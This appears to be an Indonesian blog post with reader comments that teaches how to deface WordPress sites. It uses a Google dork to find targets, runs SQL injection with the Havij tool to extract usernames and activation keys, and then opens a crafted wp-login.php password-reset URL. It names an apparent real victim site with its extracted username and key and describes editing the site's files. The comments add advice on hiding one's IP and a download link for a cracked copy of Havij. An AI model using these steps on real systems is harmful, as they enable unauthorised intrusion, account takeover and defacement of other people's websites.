Hack WordPress (SQL Injection + Reset Password) merupakan salah satu cara yang dapat kita gunakan untuk mendeface Blog WordPress. Okeh karena caranya disini lumayan panjang jadi gak usah basa-basi dulu deh langsung aja kita mulai 🙂
Pertama kita siapin dulu bahan-bahan yang dibutuhkan demi lancarnya aksi kita kali ini, hehe..
- Kompie terhubung internet
- Havij (maklum lammer jadi masih pake tool, yang dewa manual aja yah)
- dork: inurl:?fbconnect_action=myhome ( kreasi lagi yaa )
- Kesabaran dalam mencari target
- Kopi dan musik yang kuenceng ( disarankan alirannya Rock,Metal ) hehehe
saya beri contoh satu korban yaitu http://www.40sale.com/?fbconnect_action=myhome&userid=14 pada bagian “userid=” di tambahin tulisan ” fb” jadi bentuknya seperti ini http://www.40sale.com/?fbconnect_action=myhome&fbuserid=14
kalau udah scan dengan Havij dan cari tabel wp_user atau yang berhubungan dengan user lah,kalau udah ketemu cari column user_login dan user_activation_key
heheh…dah ketemu tuh yang kita cari,
username:pico
Activation key: GBasuGIZFtbUjpP3MvWb
sekarang kita gunakan exploitnya yaitu
wp-login.php?action=rp&key=“kode aktivasi”&login=“user login”
jadi alamatnya tadi dirubah seperti ini http://www.40sale.com/wp-login.php?action=rp&key=GBasuGIZFtbUjpP3MvWb&login=pico
sampailah kita ke tahap me-reset password korban heheh,kalau udah direset kita tinggal login dan melakukan sekehendak kita
saya cukup ngedit home.php nya aja dah,hehehe
buseeeet hasilnya kelam banget dah…sory ya min
mantap gan, ijin coba dulunih triknya 🙂
silakan n maksih kunjunganya 🙂
ikutan blajar ya…
sya jg msih belajar, kita sma2 bljar 🙂
itu kogh gk pkk kyk HIDE ip gk p” emngnya…
newbie bngt nich gan, tolong ajarin y…
ya kalo itu wajib gan, trus saran sy gak usah kita coba deface web indo kecuali kalo emang web tersebut ada unsur pornografi/penghinaan agama ntar berat urusanya ma polisi, he~
ow gitu…
trus klo masnya sebelumdeface web apa aja persiapannya..
misal kyk hide ip, atau semacam anonymusly…
Maaf sblmnya mas klo saya banyak nanya” soalnya saya masih bljar..
drpd saya gk nanya tp ntar mlh sesat di jalan… 😀
ya banyak ko software buat hide ip cuma sesuaikan aja ma os yg kita gunakan, yang paling gampang ya kita bisa pake add-ons firefox yaitu anonymox, firefox itu browser yg paling sesuai buat hacking karena byak add-ons yg bisa kita gunakan utk memudahkan proses hacking, misal kita ingin hack web dengan sql maka kita bisa gunakan add-ons sql inject me
OK mas…
saya cobak dulu… 😀
klo kyk tor yg di BT anda udah mencobakah…
tp klo SQL inject pkk software, berarti kita harus instal hide ip y…
apa da cara lain…??
😀
sy udah coba tapi bukan di BT coz sy pakenya linux mint, ya kalo pake windows mah banyak software yang bsa dipake salah satunya ya install hide ip tadi, kalo cara yg lain sy blum coba 🙂
om ini ane coba terus reset admin.a masuk ke email.a :3
saran om 😀
itulah kelemahan dari teknik ini, kalo saran sy mending cari target lain aja gan 🙂
donwload havij nya di mana min? maklum newbi
masuk sini gan : http://www.4shared.com/get/5pyMCQ58/Havij_115__Registro__Full_.html
mas klo saya ada target nich y misalnya…
http://www.target.com...
trus saya mau caro dorknya gmn y caranya, target di atas ini pakai wordpress…
mohon pencerahannya masih newbie bngt nich,,
gini kalo kita pake cara ini, kita gak bisa milih target sesuai keinginan walopun itu wordpress, yang perlu diingat adalah kita bisa milih target kalo emang wordpress tersebut muncul di hasil pencarian google pake dork diatas.
aku minta scrip html nya yg buat tmpiln tu hackernya gan…
gak ada gan, kalo mau ntar ane kasih script yg lain 🙂
o ya. saya mau tanya. bila kita sudah dapat nama login nya. pilih mana satu ya? kok. ada banyak user login.
Bisa nggak kalau mengetahui password akun twitter?
teknik ini sudah ga bisa ..
sekarang kalo lupa password langsung di kirim ke email ..
Klo gak ada User_activation_code Gimana??
Check your e-mail for your new password. <<< Gimana tuh???
gan dapet dari mana /?fbconnect_action=myhome&fbuserid=14